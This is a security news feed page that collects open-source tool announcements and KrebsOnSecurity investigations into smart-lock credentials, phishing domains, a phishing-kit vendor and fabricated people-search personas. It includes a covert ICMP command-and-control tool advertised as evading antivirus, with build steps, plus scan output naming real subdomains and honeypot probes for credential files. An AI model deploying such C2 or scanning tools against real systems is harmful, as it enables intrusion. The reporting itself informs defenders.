FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

By: Zion3R


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

██████ █████ ██ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ███ ███████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ██ ██ ███████ ██ ██ ██ ██
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

😑

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

By: Zion3R



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

Features

  • Check the status of single or multiple URLs/domains.
  • Asynchronous HTTP requests for improved performance.
  • Color-coded output for better visualization of status codes.
  • Progress bar when checking multiple URLs.
  • Save results to an output file.
  • Error handling for inaccessible URLs and invalid responses.
  • Command-line interface for easy usage.

Installation

  1. Clone the repository:

bash git clone https://github.com/your_username/status-checker.git cd status-checker

  1. Install dependencies:

bash pip install -r requirements.txt

Usage

python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
  • -d, --domain: Single domain/URL to check.
  • -l, --list: File containing a list of domains/URLs to check.
  • -o, --output: File to save the output.
  • -v, --version: Display version information.
  • -update: Update the tool.

Example:

python status_checker.py -l urls.txt -o results.txt

Preview:

License

This project is licensed under the MIT License - see the LICENSE file for details.



Crickets from Chirp Systems in Smart Lock Key Leak

The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

“Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”

Matt Brown, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.

“I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”

Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor August.com, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.

Update, April 18, 11:55 a.m. ET: August has provided a statement saying it does not believe August or Yale locks are vulnerable to the hack described by Brown.

“We were recently made aware of a vulnerability disclosure regarding access control systems provided by Chirp, using August and Yale locks in multifamily housing,” the company said. “Upon learning of these reports, we immediately and thoroughly investigated these claims. Our investigation found no evidence that would substantiate the vulnerability claims in either our product or Chirp’s as it relates to our systems.”

Update, April 25, 2:45 p.m. ET: Based on feedback from Chirp, CISA has downgraded the severity of this flaw and revised their security advisory to say that the hard-coded credentials do not appear to expose the devices to remote locking or unlocking. CISA says the hardcoded credentials could be used by an attacker within the range of Bluetooth (~30 meters) “to change the configuration settings within the Bluetooth beacon, effectively removing Bluetooth visibility from the device. This does not affect the device’s ability to lock or unlock access points, and access points can still be operated remotely by unauthorized users via other means.”

Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.

Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.

Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.

Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by RealPage, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.

Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”

“It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of [the affected] properties have another choice. It’s either agree to use the app or move.”

In October 2022, an investigation by ProPublica examined RealPage’s dominance in the rent-setting software market, and that it found “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”

“For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”

Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.

In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.

Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links — such as fedetwitter[.]com, which until very recently rendered as fedex.com in tweets.

The message displayed when one visits goodrtwitter.com, which Twitter/X displayed as goodrx.com in tweets and messages.

A search at DomainTools.com shows at least 60 domain names have been registered over the past two days for domains ending in “twitter.com,” although research so far shows the majority of these domains have been registered “defensively” by private individuals to prevent the domains from being purchased by scammers.

Those include carfatwitter.com, which Twitter/X truncated to carfax.com when the domain appeared in user messages or tweets. Visiting this domain currently displays a message that begins, “Are you serious, X Corp?”

Update: It appears Twitter/X has corrected its mistake, and no longer truncates any domain ending in “twitter.com” to “x.com.”

Original story:

The same message is on other newly registered domains, including goodrtwitter.com (goodrx.com), neobutwitter.com (neobux.com), roblotwitter.com (roblox.com), square-enitwitter.com (square-enix.com) and yandetwitter.com (yandex.com). The message left on these domains indicates they were defensively registered by a user on Mastodon whose bio says they are a systems admin/engineer. That profile has not responded to requests for comment.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan. The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

The domain mentioned at the beginning of this story — fedetwitter.com — redirects users to the blog of a Japanese technology enthusiast. A user with the handle “amplest0e” appears to have registered space-twitter.com, which Twitter/X users would see as the CEO’s “space-x.com.” The domain “ametwitter.com” already redirects to the real americanexpress.com.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registration records. Those include firefotwitter[.]com (firefox.com), ngintwitter[.]com (nginx.com), and webetwitter[.]com (webex.com).

The domain setwitter.com, which Twitter/X until very recently rendered as “sex.com,” redirects to this blog post warning about the recent changes and their potential use for phishing.

Sean McNee, vice president of research and data at DomainTools, told KrebsOnSecurity it appears Twitter/X did not properly limit its redirection efforts.

“Bad actors could register domains as a way to divert traffic from legitimate sites or brands given the opportunity — many such brands in the top million domains end in x, such as webex, hbomax, xerox, xbox, and more,” McNee said. “It is also notable that several other globally popular brands, such as Rolex and Linux, were also on the list of registered domains.”

The apparent oversight by Twitter/X was cause for amusement and amazement from many former users who have migrated to other social media platforms since the new CEO took over. Matthew Garrett, a lecturer at U.C. Berkeley’s School of Information, summed up the Schadenfreude thusly:

“Twitter just doing a ‘redirect links in tweets that go to x.com to twitter.com instead but accidentally do so for all domains that end x.com like eg spacex.com going to spacetwitter.com’ is not absolutely the funniest thing I could imagine but it’s high up there.”

‘The Manipulaters’ Improve Phishing, Still Fail at Opsec

Roughly nine years ago, KrebsOnSecurity profiled a Pakistan-based cybercrime group called “The Manipulaters,” a sprawling web hosting network of phishing and spam delivery platforms. In January 2024, The Manipulaters pleaded with this author to unpublish previous stories about their work, claiming the group had turned over a new leaf and gone legitimate. But new research suggests that while they have improved the quality of their products and services, these nitwits still fail spectacularly at hiding their illegal activities.

In May 2015, KrebsOnSecurity published a brief writeup about the brazen Manipulaters team, noting that they openly operated hundreds of web sites selling tools designed to trick people into giving up usernames and passwords, or deploying malicious software on their PCs.

Manipulaters advertisement for “Office 365 Private Page with Antibot” phishing kit sold on the domain heartsender,com. “Antibot” refers to functionality that attempts to evade automated detection techniques, keeping a phish deployed as long as possible. Image: DomainTools.

The core brand of The Manipulaters has long been a shared cybercriminal identity named “Saim Raza,” who for the past decade has peddled a popular spamming and phishing service variously called “Fudtools,” “Fudpage,” “Fudsender,” “FudCo,” etc. The term “FUD” in those names stands for “Fully Un-Detectable,” and it refers to cybercrime resources that will evade detection by security tools like antivirus software or anti-spam appliances.

A September 2021 story here checked in on The Manipulaters, and found that Saim Raza and company were prospering under their FudCo brands, which they secretly managed from a front company called We Code Solutions.

That piece worked backwards from all of the known Saim Raza email addresses to identify Facebook profiles for multiple We Code Solutions employees, many of whom could be seen celebrating company anniversaries gathered around a giant cake with the words “FudCo” painted in icing.

Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions. The first was in the weeks following the Sept. 2021 piece, when one of Saim Raza’s known email addresses — bluebtcus@gmail.com — pleaded to have the story taken down.

“Hello, we already leave that fud etc before year,” the Saim Raza identity wrote. “Why you post us? Why you destroy our lifes? We never harm anyone. Please remove it.”

Not wishing to be manipulated by a phishing gang, KrebsOnSecurity ignored those entreaties. But on Jan. 14, 2024, KrebsOnSecurity heard from the same bluebtcus@gmail.com address, apropos of nothing.

“Please remove this article,” Sam Raza wrote, linking to the 2021 profile. “Please already my police register case on me. I already leave everything.”

Asked to elaborate on the police investigation, Saim Raza said they were freshly released from jail.

“I was there many days,” the reply explained. “Now back after bail. Now I want to start my new work.”

Exactly what that “new work” might entail, Saim Raza wouldn’t say. But a new report from researchers at DomainTools.com finds that several computers associated with The Manipulaters have been massively hacked by malicious data- and password-snarfing malware for quite some time.

DomainTools says the malware infections on Manipulaters PCs exposed “vast swaths of account-related data along with an outline of the group’s membership, operations, and position in the broader underground economy.”

“Curiously, the large subset of identified Manipulaters customers appear to be compromised by the same stealer malware,” DomainTools wrote. “All observed customer malware infections began after the initial compromise of Manipulaters PCs, which raises a number of questions regarding the origin of those infections.”

A number of questions, indeed. The core Manipulaters product these days is a spam delivery service called HeartSender, whose homepage openly advertises phishing kits targeting users of various Internet companies, including Microsoft 365, Yahoo, AOL, Intuit, iCloud and ID.me, to name a few.

A screenshot of the homepage of HeartSender 4 displays an IP address tied to fudtoolshop@gmail.com. Image: DomainTools.

HeartSender customers can interact with the subscription service via the website, but the product appears to be far more effective and user-friendly if one downloads HeartSender as a Windows executable program. Whether that HeartSender program was somehow compromised and used to infect the service’s customers is unknown.

However, DomainTools also found the hosted version of HeartSender service leaks an extraordinary amount of user information that probably is not intended to be publicly accessible. Apparently, the HeartSender web interface has several webpages that are accessible to unauthenticated users, exposing customer credentials along with support requests to HeartSender developers.

“Ironically, the Manipulaters may create more short-term risk to their own customers than law enforcement,” DomainTools wrote. “The data table “User Feedbacks” (sic) exposes what appear to be customer authentication tokens, user identifiers, and even a customer support request that exposes root-level SMTP credentials–all visible by an unauthenticated user on a Manipulaters-controlled domain. Given the risk for abuse, this domain will not be published.”

This is hardly the first time The Manipulaters have shot themselves in the foot. In 2019, The Manipulaters failed to renew their core domain name — manipulaters[.]com — the same one tied to so many of the company’s past and current business operations. That domain was quickly scooped up by Scylla Intel, a cyber intelligence firm that focuses on connecting cybercriminals to their real-life identities.

Currently, The Manipulaters seem focused on building out and supporting HeartSender, which specializes in spam and email-to-SMS spamming services.

“The Manipulaters’ newfound interest in email-to-SMS spam could be in response to the massive increase in smishing activity impersonating the USPS,” DomainTools wrote. “Proofs posted on HeartSender’s Telegram channel contain numerous references to postal service impersonation, including proving delivery of USPS-themed phishing lures and the sale of a USPS phishing kit.”

Reached via email, the Saim Raza identity declined to respond to questions about the DomainTools findings.

“First [of] all we never work on virus or compromised computer etc,” Raza replied. “If you want to write like that fake go ahead. Second I leave country already. If someone bind anything with exe file and spread on internet its not my fault.”

Asked why they left Pakistan, Saim Raza said the authorities there just wanted to shake them down.

“After your article our police put FIR on my [identity],” Saim Raza explained. “FIR” in this case stands for “First Information Report,” which is the initial complaint in the criminal justice system of Pakistan.

“They only get money from me nothing else,” Saim Raza continued. “Now some officers ask for money again again. Brother, there is no good law in Pakistan just they need money.”

Saim Raza has a history of being slippery with the truth, so who knows whether The Manipulaters and/or its leaders have in fact fled Pakistan (it may be more of an extended vacation abroad). With any luck, these guys will soon venture into a more Western-friendly, “good law” nation and receive a warm welcome by the local authorities.

Noia - Simple Mobile Applications Sandbox File Browser Tool

By: Zion3R


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

LICENCE

MIT



Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

By: Zion3R

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information

gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



The Not-so-True People-Search Network from China

It’s not unusual for the data brokers behind people-search websites to use pseudonyms in their day-to-day lives (you would, too). Some of these personal data purveyors even try to reinvent their online identities in a bid to hide their conflicts of interest. But it’s not every day you run across a US-focused people-search network based in China whose principal owners all appear to be completely fabricated identities.

Responding to a reader inquiry concerning the trustworthiness of a site called TruePeopleSearch[.]net, KrebsOnSecurity began poking around. The site offers to sell reports containing photos, police records, background checks, civil judgments, contact information “and much more!” According to LinkedIn and numerous profiles on websites that accept paid article submissions, the founder of TruePeopleSearch is Marilyn Gaskell from Phoenix, Ariz.

The saucy yet studious LinkedIn profile for Marilyn Gaskell.

Ms. Gaskell has been quoted in multiple “articles” about random subjects, such as this article at HRDailyAdvisor about the pros and cons of joining a company-led fantasy football team.

“Marilyn Gaskell, founder of TruePeopleSearch, agrees that not everyone in the office is likely to be a football fan and might feel intimidated by joining a company league or left out if they don’t join; however, her company looked for ways to make the activity more inclusive,” this paid story notes.

Also quoted in this article is Sally Stevens, who is cited as HR Manager at FastPeopleSearch[.]io.

Sally Stevens, the phantom HR Manager for FastPeopleSearch.

“Fantasy football provides one way for employees to set aside work matters for some time and have fun,” Stevens contributed. “Employees can set a special league for themselves and regularly check and compare their scores against one another.”

Imagine that: Two different people-search companies mentioned in the same story about fantasy football. What are the odds?

Both TruePeopleSearch and FastPeopleSearch allow users to search for reports by first and last name, but proceeding to order a report prompts the visitor to purchase the file from one of several established people-finder services, including BeenVerified, Intelius, and Spokeo.

DomainTools.com shows that both TruePeopleSearch and FastPeopleSearch appeared around 2020 and were registered through Alibaba Cloud, in Beijing, China. No other information is available about these domains in their registration records, although both domains appear to use email servers based in China.

Sally Stevens’ LinkedIn profile photo is identical to a stock image titled “beautiful girl” from Adobe.com. Ms. Stevens is also quoted in a paid blog post at ecogreenequipment.com, as is Alina Clark, co-founder and marketing director of CocoDoc, an online service for editing and managing PDF documents.

The profile photo for Alina Clark is a stock photo appearing on more than 100 websites.

Scouring multiple image search sites reveals Ms. Clark’s profile photo on LinkedIn is another stock image that is currently on more than 100 different websites, including Adobe.com. Cocodoc[.]com was registered in June 2020 via Alibaba Cloud Beijing in China.

